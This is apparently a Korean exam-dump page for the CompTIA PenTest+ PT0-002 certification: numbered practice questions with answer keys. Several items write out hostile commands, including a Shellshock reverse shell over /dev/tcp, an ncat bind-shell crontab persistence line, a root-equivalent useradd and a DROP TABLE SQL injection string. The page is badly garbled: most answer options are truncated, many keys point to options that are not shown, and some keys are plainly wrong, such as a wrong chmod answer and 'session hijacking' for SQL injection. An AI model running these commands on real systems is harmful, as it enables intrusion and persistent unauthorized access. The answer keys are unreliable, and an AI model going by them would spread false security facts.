아무것도 놓치고 싶지 않으신가요?

인증 시험 합격 팁

최신 시험 소식 및 할인 정보

전문가가 선별하고 최신 정보를 제공합니다.

예, 뉴스레터를 보내주세요

최고의 CompTIA PT0-002 모의고사 및 실제 시험 시뮬레이션, CompTIA PenTest + 인증 | SPOTO

우리의 최고의 CompTIA PT0-002연습문제와 실제 시험 시뮬레이션으로 당신의 CompTIA PenTest+(PT0-002) 자격증 취득을 준비해 보세요. 시험에 대비하는 가장 좋은 방법은 최신 시험 문제로 연습하는 것입니다. 우리의 실제 시험과 실제 시험 시뮬레이션은 종합적이고 현실적인 시험 경험을 제공하도록 설계되었습니다. 침투 테스트 및 취약성 관리를 담당하는 사이버 보안 전문가에게 이상적인 자격증은 CompTIA PenTest+입니다. 모의 시험, 샘플 문제, 시험 덤프, 시험 문제와 정답에 액세스하여 시험 당일에 자신의 기술과 지식을 충분히 발휘할 수 있도록 준비할 수 있습니다. 모의 시험과 시험 시뮬레이터는 실제 시험 환경을 시뮬레이션하여 시험 준비를 더욱 강화합니다. 우리의 시험 자료와 시험 답안을 활용하여 PT0-002시험에 대한 이해와 준비를 강화할 수 있습니다. 우리의 시험 준비 자료로 자신감을 가지고 준비하여 성공적인 결과를 얻으세요.
다른 온라인 시험에 응시하세요

질문 #1
모의 침투 테스터가 회사의 최고 법률 고문에게 MITRE ATT&CK 프레임워크를 설명하고 있습니다. 다음 중 테스터가 이 프레임워크의 장점으로 가장 많이 설명할 수 있는 것은 무엇인가요?
A. 보안 침입의 전술을 이해하면 침입을 차단하는 데 도움이 될 수 있습니다
B. 프레임워크의 일부인 스크립트를 SIEM 도구로 직접 가져올 수 있습니다
답변 보기
정답: D
질문 #2
Nmap 스캔 결과는 다음과 같습니다: 2021-01-24 01:10 EST에 Nmap 7.80 ( https://nmap.org ) 시작 ( 10.2.1.22 ) 호스트에 대한 Nmap 스캔 보고서가 실행 중입니다(대기 시간 0.0102초). 표시되지 않음: 998 필터링된 포트 포트 상태 서비스 80/tcp http 열기 |_http-title: 80F 22% RH 1009.1MB (텍스트/html) |_http-slowloris-check: | VULNERABLE: | 슬로우로리스 DoS 공격 | <..> 디바이스 유형: 브리지|일반 목적 실행 중(JUST GUESSING) : QEMU (95%) OS CPE: cpe:/a:qemu:qemu 호스트에 대한 정확한 OS 일치 항목 없음(테스트 조건 비이상적
B. C
E. 노출된 RDP
F. 인쇄 대기열
답변 보기
정답: D
질문 #3
최고 정보 보안 책임자는 모의 침투 테스터가 회사 직원의 보안 인식 수준을 평가하기를 원합니다. 다음 중 테스터가 이 목표를 달성하는 데 도움이 될 수 있는 도구는 무엇인가요?
A. 메타스플로잇 B
답변 보기
정답: B
질문 #4
모의 침투 테스터가 웹 애플리케이션에 대한 수동 평가를 수행하는 동안 다음과 같은 유효한 URL을 발견했습니다: http://www.example.com/product.php?id=123987. 다음 중 이 URL의 취약점을 식별하기 위해 NEXT를 사용하는 가장 좋은 자동화된 도구는 무엇인가요?
A. SQLmap
B. 네서스 C
답변 보기
정답: B
질문 #5
모의 침투 테스트 계약 중에 컨설턴트는 피싱 캠페인의 잠재적 표적을 식별하기 위해 고객에 대한 정찰을 수행합니다. 다음 중 컨설턴트가 고객의 사이버 보안 도구를 트리거하지 않고 기술 및 청구 연락처용 이메일 주소를 신속하게 검색할 수 있는 방법은? (두 개를 선택하세요.)
A. 소셜 미디어 사이트 스크랩
B. WHOIS 조회 도구 사용 C
E. DNS 조회 도구 활용
F. 고객 시설 근처에서 워드라이빙 실시
답변 보기
정답: C
질문 #6
다음 중 침투 테스트자가 파일 소유자가 셸 스크립트를 실행할 수 있도록 허용하는 명령은 무엇입니까?
A. chmod u+x script
B. chmod u+e script
답변 보기
정답: BD
질문 #7
침투 테스터가 서버에서 MD5 해시를 수집하고 레인보우 테이블을 사용하여 해시를 쉽게 크랙할 수 있었습니다. 다음 중 수정 보고서에 권장 사항으로 포함되어야 하는 것은 무엇인가요?
A. 더 강력한 알고리즘 요구 사항
B. 서버의 접근 제어 C
답변 보기
정답: B
질문 #8
한 회사가 클라우드 서비스 제공업체가 소프트웨어 개발을 위한 가상 머신을 적절히 보호하지 못하고 있다고 우려하고 있습니다. 이 VM은 물리적 리소스를 공유하는 다른 회사들과 함께 데이터 센터에 보관되어 있습니다. 다음 중 이 회사가 가장 우려하는 공격 유형은 무엇인가요?
A. 데이터 홍수
B. 세션 라이딩 C
답변 보기
정답: B
질문 #9
회사의 보안 관행에 대한 물리적 평가를 수행 중인 모의 침투 테스터가 회사 건물 내에 파쇄기가 없다는 사실을 발견했습니다. 다음 중 기밀 정보를 얻기 위해 가장 적합한 기술은 무엇인가요?
A. 배지 복제
B. 덤스터 다이빙 C
답변 보기
정답: A
질문 #10
모의 침투 테스트가 10.10.1.1에서 취약한 웹 서버를 발견합니다. 그런 다음 테스터는 웹 익스플로잇을 전송하는 Python 스크립트를 편집하고 다음 코드를 발견합니다: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/ tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} 다음 중 테스터가 서버가 실행되는 사용자 컨텍스트를 확인하기 위해 스크립트를 수정해야 하는 것은 무엇인가요?
A. 익스플로잇 = {"사용자-에이전트": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. 익스플로잇 = {"사용자-에이전트": "() { 무시;};/bin/bash -i>& find / -perm -4000", "수락": "text/html,application/xhtml+xml,application/xml"} C
답변 보기
정답: C
질문 #11
모의 침투 테스터가 참여에 사용할 자격 증명을 찾기 위해 .pcap 파일을 받았습니다. 테스터가 .pcap 파일을 열고 읽기 위해 다음 중 어떤 도구를 사용해야 하나요?
A. Nmap B
답변 보기
정답: C
질문 #12
한 회사에서 네트워크에 악성 액세스 포인트를 배포하고 설정하기 위해 침투 테스터를 고용했습니다. 다음 중 이 목표를 달성하는 데 가장 적합한 도구는 무엇입니까? A.와이어샤크 B.에어크랙 C.키스멧 D.와이파이트
한 회사에서 네트워크에 악성 액세스 포인트를 배포하고 설정하기 위해 침투 테스터를 고용했습니다. 다음 중 이 목표를 달성하는 데 가장 적합한 도구는 무엇입니까? A
답변 보기
정답: B
질문 #13
다음 중 공격자들이 사용하는 일반적인 전술 및 기법의 매트릭스와 권장 완화 조치를 제공하는 것은 무엇인가요? A.NIST SP 800-53 B.OWASP 상위 10위 C.MITRE ATT&CK 프레임워크 D.PTES 기술 가이드라인
다음 중 공격자들이 사용하는 일반적인 전술 및 기법의 매트릭스와 권장 완화 조치를 제공하는 것은 무엇인가요? A. IST SP 800-53 B
답변 보기
정답: C
질문 #14
모의 침투 테스터가 모바일 클라이언트의 랩톱에서 Windows 워크스테이션에 성공적으로 액세스하는 데 성공했습니다. 다음 중 테스터가 시스템에 대한 액세스 권한을 유지할 수 있도록 하기 위해 사용할 수 있는 방법은? A.schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe B.wmic startup get caption,command C.crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null D.sudo useradd -ou 0 -g 0 사용자
모의 침투 테스터가 모바일 클라이언트의 랩톱에서 Windows 워크스테이션에 성공적으로 액세스하는 데 성공했습니다. 다음 중 테스터가 시스템에 대한 액세스 권한을 유지할 수 있도록 하기 위해 사용할 수 있는 방법은? A
답변 보기
정답: C
질문 #15
다음 중 수동 정찰을 지원하기 위해 IoT 디바이스에 대한 공급업체 및 기타 보안 관련 정보를 수집하는 데 가장 유용한 도구는 무엇인가요?
A. 쇼단
B. Nmap C
답변 보기
정답: D
질문 #16
Nmap 스캔 결과는 다음과 같습니다: 다음 중 이 디바이스에 대한 가장 좋은 결론은 무엇인가요?
A. 이 디바이스는 TCP/22를 통한 트랜잭션이 하트비트 확장 패킷을 처리하는 방식 때문에 하트블리드 버그에 취약할 수 있으며, 공격자가 프로세스 메모리에서 민감한 정보를 얻을 수 있습니다
B. 이 장치는 대역 내 관리 서비스를 제공하는 게이트웨이일 가능성이 높습니다
답변 보기
정답: C
질문 #17
핫스팟 귀하는 웹 서버를 강화하는 임무를 맡은 보안 분석가입니다. 악성으로 플래그가 지정된 HTTP 페이로드 목록이 주어졌습니다. 지침 다음 공격 시그니처가 주어지면 공격 유형을 파악한 다음 향후 공격을 방지하기 위한 관련 해결 방법을 파악하세요. 언제든지 시뮬레이션의 초기 상태로 되돌리려면 모두 초기화 버튼을 클릭하세요.
A.
답변 보기
정답: D
질문 #18
한 보안 회사가 범위가 지정된 내부자 위협 평가를 수행하도록 계약을 맺고 PII와 급여 데이터가 저장된 인사 서버에 액세스하려고 시도했습니다
A. 모의 침투 테스터에게 내부 네트워크 시작 위치가 주어졌습니다
A. SQL 데이터베이스의 구성 취약점 악용
B. 아웃바운드 TLS 트래픽 가로채기 C
E. 도메인 컨트롤러에서 지속성 설정 및 유지 관리
답변 보기
정답: A
질문 #19
모의 침투 테스터가 인터페이스에서 이전에 알려지지 않은 IP 범위를 가진 네트워크 장치에 액세스했습니다. 추가 조사 결과 타사 공급업체에 대한 상시 접속 VPN 터널로 확인되었습니다. 다음 중 모의 침투 테스터가 취해야 할 최선의 조치는 무엇인가요?
A. 터널을 다른 내부 장치로 피벗하는 수단으로 활용하세요
B. IP 범위는 범위를 벗어난 것이므로 무시하세요
답변 보기
정답: B
질문 #20
모의 침투 테스터가 평가를 시작하고 있지만 대상 회사에 대한 공개 정보만 가지고 있습니다. 고객은 이 연습에 대해 알고 있으며 테스트를 준비하고 있습니다. 다음 중 평가의 범위를 설명하는 것은 무엇인가요?
A. 부분적으로 알려진 환경 테스트
B. 알려진 환경 테스트 C
답변 보기
정답: A
질문 #21
모의 침투 테스터가 서브넷에서 라이브 호스트를 빠르게 찾으려고 합니다. 다음 중 핑 스캔을 수행하는 명령은 무엇인가요? A.nmap -sn 10.12.1.0/24 B.nmap -sV -A 10.12.1.0/24 C.nmap -Pn 10.12.1.0/24 D.nmap -sT -p- 10.12.1.0/24
모의 침투 테스터가 서브넷에서 라이브 호스트를 빠르게 찾으려고 합니다. 다음 중 핑 스캔을 수행하는 명령은 무엇인가요? A
답변 보기
정답: D
질문 #22
자동차 산업을 위한 임베디드 소프트웨어를 개발하는 한 회사는 납품 전에 제품의 보안을 평가하기 위해 모의 침투 테스트 팀을 고용했습니다. 모의 침투 테스트 팀은 개념 증명 익스플로잇을 개발하기 위해 바이너리를 분석할 수 있는 리버스 엔지니어링 팀에 하청을 주겠다는 의사를 밝혔습니다. 소프트웨어 회사는 하청 계약을 승인하기 전에 리버스 엔지니어링 팀에 대한 추가 배경 조사를 요청했습니다. 다음 중 어느 것이 우려되나요?
A. 리버스 엔지니어링 팀이 제3자에게 익스플로잇을 판매한 이력이 있을 수 있습니다
B. 리버스 엔지니어링 팀은 분석을 위해 비공개 소스 또는 기타 비공개 정보 피드를 사용할 수 있습니다
답변 보기
정답: A
질문 #23
모의 침투 테스터가 내부 웹 서버를 무차별 대입하여 다음과 같은 출력을 생성하는 명령을 실행했습니다: 그러나 모의 침투 테스터가 URL http://172.16.100.10:3000/profile 을 탐색하려고 했을 때 빈 페이지가 표시되었습니다. 다음 중 출력이 없는 가장 가능성이 높은 이유는 무엇인가요?
A. 방화벽에서 HTTP 포트가 열려 있지 않습니다
B. 테스터가 명령 전에 sudo를 실행하지 않았습니다
답변 보기
정답: A
질문 #24
다음 줄 번호가 붙은 Python 코드 스니펫이 정찰에 사용되고 있습니다: 다음 중 스크립트의 줄 번호가 조직의 IDS에서 '포트 스캔 가능성' 경고를 트리거하는 데 기여했을 가능성이 가장 높은 스크립트는 무엇인가요?
A. 01번 라인
B. 라인 02 C
답변 보기
정답: C
질문 #25
다음 중 고객이 침투 테스트 팀과 교훈을 얻는 회의를 개최하는 이유를 가장 잘 설명하는 것은 무엇인가요?
A. 보고서 구조에 대한 피드백을 제공하고 개선을 권고하려면 다음과 같이 하세요
B. 결과에 대해 논의하고 오탐에 대해 이의를 제기하기 위해 C
답변 보기
정답: B
질문 #26
침투 테스터를 고용하여 고객사 건물 내 보안실에 접근하기 위한 물리적 침투 테스트를 수행했습니다. 외부 정찰을 통해 두 개의 출입구, WiFi 게스트 네트워크, 인터넷에 연결된 여러 대의 보안 카메라를 확인했습니다. 다음 중 추가 정찰을 가장 잘 지원하는 도구 또는 기법은 무엇인가요?
A. 워드라이빙
B. 쇼단 C
답변 보기
정답: A
질문 #27
한 회사가 클라우드 서비스 제공업체로부터 취약성 스캔에 대한 허가를 받았으며 이제 호스팅된 데이터의 보안을 테스트하려고 합니다. 이 위험을 평가하기 위해 테스터가 가장 먼저 확인해야 하는 것은 무엇인가요?
A. 민감한 클라이언트 데이터가 공개적으로 액세스 가능한지 여부
B. 클라우드와 클라이언트 간의 연결이 안전한지 여부 C
답변 보기
정답: AC
질문 #28
모의 침투 테스터가 Windows 서버에서 다음 명령을 실행했습니다: 다음 중 테스터가 최종 보고서를 제출한 후 수행해야 하는 작업은 무엇입니까?
A. 예약된 배치 작업을 삭제합니다
B. 리버스 셸 연결을 닫습니다
답변 보기
정답: B
질문 #29
한 회사의 최고 경영자가 보조 홈 오피스를 만들었는데 사용 중인 WiFi 서비스가 공격에 취약하다고 우려하고 있습니다. 침투 테스터를 고용하여 WiFi 라우터의 보안을 테스트하고 있습니다. 다음 중 무차별 암호 대입 공격에 가장 취약한 것은 무엇인가요? A.WPS B.WPA2-EAP C.WPA-TKIP D.WPA2-PSK
한 회사의 최고 경영자가 보조 홈 오피스를 만들었는데 사용 중인 WiFi 서비스가 공격에 취약하다고 우려하고 있습니다. 침투 테스터를 고용하여 WiFi 라우터의 보안을 테스트하고 있습니다
답변 보기
정답: A
질문 #30
모의 침투 테스터에게 고객의 금융 시스템에 액세스하는 데 영업일 기준 8시간이 주어졌습니다. 다음 중 성공 가능성이 가장 높은 기법은 무엇입니까?
A. 고객의 작업장에 들어가는 직원을 미행하려는 행위
B. 회사 로고가 있는 악성 USB 키를 주차장에 떨어뜨리기 C
답변 보기
정답: B
질문 #31
모의 침투 테스터가 클라이언트의 중요 서버에 대한 취약점 스캔을 수행한 결과 다음을 발견했습니다: 다음 중 해결을 위한 권장 사항은 무엇인가요?
A. 사용자 교육 프로그램 배포
B. C
답변 보기
정답: C
질문 #32
Nmap 스캔은 웹 서버와 데이터베이스의 열린 포트를 보여줍니다. 모의 침투 테스터는 이러한 시스템에 대한 취약점과 추가 정보를 식별하기 위해 WPScan 및 SQLmap을 실행하기로 결정합니다. 다음 중 모의 침투 테스터가 수행하려는 작업은 무엇인가요?
A. 수집된 증거를 바탕으로 잠재적인 범죄 행위를 발견합니다
B. 환경의 모든 취약점을 식별합니다
답변 보기
정답: A
질문 #33
다음 중 인터넷에 직접 연결된 IoT 디바이스와 관련된 가장 일반적인 취약점은 무엇인가요?
A. 지원되지 않는 운영 체제
B. 디도스 공격에 대한 취약성 C
답변 보기
정답: A
질문 #34
침투 테스터가 대상에 대해 Nmap 스캔을 수행하고 다음 결과를 수신합니다: 다음 중 테스터가 대상에서 TCP 포트 1080을 사용하여 스캔 도구를 리디렉션하기 위해 사용해야 하는 것은 무엇입니까?
A. Nessus
B. 프록시체인 C
답변 보기
정답: D
질문 #35
한 대형 고객이 네트워크 내에서 인터넷에 연결된 디바이스를 스캔하는 모의 침투 테스터를 원합니다. 클라이언트는 특히 인증 요구 사항이 없는 Cisco 디바이스를 찾고 있습니다. 다음 중 클라이언트의 요구 사항을 충족하는 Shodan의 설정은 무엇인가요?
A. "cisco-ios" "admin+1234"
B. "cisco-ios" "no-password" C
답변 보기
정답: D
질문 #36
모의 침투 테스터는 클라이언트와 서버 간의 NTLM 챌린지-응답 트래픽을 캡처할 수 있습니다. 다음 중 서버에 액세스하기 위해 PCAP로 수행할 수 있는 작업은 무엇인가요?
A. 수직 권한 에스컬레이션을 수행합니다
B. 캡처한 트래픽을 서버로 재생하여 세션을 다시 생성합니다
답변 보기
정답: C
질문 #37
다음 중 모의 침투 테스터가 침해한 Windows 서버에서 sdelete mimikatz 명령을 실행하는 이유를 설명하는 것은? * 명령을 실행하는 이유를 설명하는 것은?
A. 해시 크래킹 레지스트리 항목을 제거하려면 다음과 같이 하세요
B. 테스터가 생성한 미미카츠 계정을 제거하려면 C
답변 보기
정답: C
질문 #38
한 신규 고객이 침투 테스트 회사를 고용하여 고객의 신규 서비스에 대한 다양한 보안 평가를 위해 한 달간 계약을 체결했습니다. 고객은 평가가 완료된 후 곧 새 서비스를 공개할 예정이며, 중요한 문제를 제외한 모든 발견 사항을 서비스 공개 후 수정할 계획입니다. 고객은 간단한 보고서 구조를 원하며 매일 결과를 받고 싶지 않습니다. 다음 중 침투 테스터가 정의하는 데 가장 중요한 것은 무엇인가요?
A. 클라이언트가 요구하는 형식을 설정합니다
B. 고객에게 즉시 에스컬레이션할 위험 임계값을 설정합니다
답변 보기
정답: B
질문 #39
모의 침투 테스터가 웹 서버에 대한 평가를 수행했습니다. 이 세션의 로그는 다음을 보여줍니다: http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- 다음 중 어떤 공격이 시도되고 있습니까? A. 클릭재킹
B. 세션 하이재킹 C
답변 보기
정답: B
질문 #40
규정 준수 기반 침투 테스트의 주요 관심사는 다음과 같습니다:
A. 보호된 네트워크에서 Pll을 얻습니다
B. 엣지 디바이스에서 보호 우회
답변 보기
정답: C
질문 #41
한 컨설팅 회사가 스코핑 중에 ROE를 작성하고 있습니다. 다음 중 ROE에 포함되어야 하는 것은 무엇인가요?
A. 평가 비용
B. 보고서 배포 C
답변 보기
정답: A
질문 #42
침투 테스터에게 192.168.1.0/24 범위의 일련의 표적을 공격하여 가능한 한 적은 경보와 대응 조치를 트리거하라는 임무가 주어졌습니다. 다음 중 이 목표를 가장 잘 달성할 수 있는 Nmap 스캔 구문은 무엇인가요?
A. nmap -sT -vvv -O 192
B. nmap -sV 192
답변 보기
정답: A
질문 #43
한 회사가 직원들을 대상으로 소셜 엔지니어링 테스트를 수행하기 위해 모의 침투 테스터를 고용했습니다. 테스터는 회사 웹사이트에서 직원들의 전화번호를 찾지 못했지만, 몇 달 전에 전체 전화번호 카탈로그가 게시되었다는 사실을 알게 되었습니다. 다음 중 모의 침투 테스터가 가장 먼저 직원의 전화번호를 찾아야 하는 곳은 어디인가요?
A. 웹 아카이브 B
답변 보기
정답: A
질문 #44
한 소프트웨어 회사가 데이터베이스 서버에 대한 모의 침투 테스트를 수행하기 위해 모의 침투 테스터를 고용했습니다. 테스터에게는 회사의 개인정보 보호 정책에 따라 사용되는 다양한 도구가 제공되었습니다. 다음 중 이 서버의 취약점을 찾는 데 가장 적합한 도구는 무엇입니까? A.OpenVAS B.Nikto C.SQLmap D.Nessus
한 소프트웨어 회사가 데이터베이스 서버에 대한 모의 침투 테스트를 수행하기 위해 모의 침투 테스터를 고용했습니다. 테스터에게는 회사의 개인정보 보호 정책에 따라 사용되는 다양한 도구가 제공되었습니다
답변 보기
정답: A
질문 #45
시뮬레이션 귀하는 서버에서 포트 스캔을 실행하는 모의 침투 테스터입니다. 지침 파트 1: 출력이 주어지면, 사용 가능한 옵션에서 이 출력을 생성하는 데 사용된 명령을 구성합니다. 2단계: 명령이 적절하게 구성되면 주어진 출력을 사용하여 추가로 조사해야 할 잠재적 공격 벡터를 식별합니다. 언제든지 시뮬레이션의 초기 상태로 되돌리려면 모두 재설정 버튼을 클릭하세요.
A. 아래 설명을 참조하세요
답변 보기
정답: C
질문 #46
침투 테스터가 사용자가 로그인한 후 HTTP프로토콜의 상태를 제어하기 위해 공격해야 하는 것은 다음 중 어느 것입니까?
A. HTTPS 통신
B. 공개 및 개인 키 C
답변 보기
정답: A

제출 후 답변 보기

질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.

참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.

이메일:
WhatsApp/전화번호: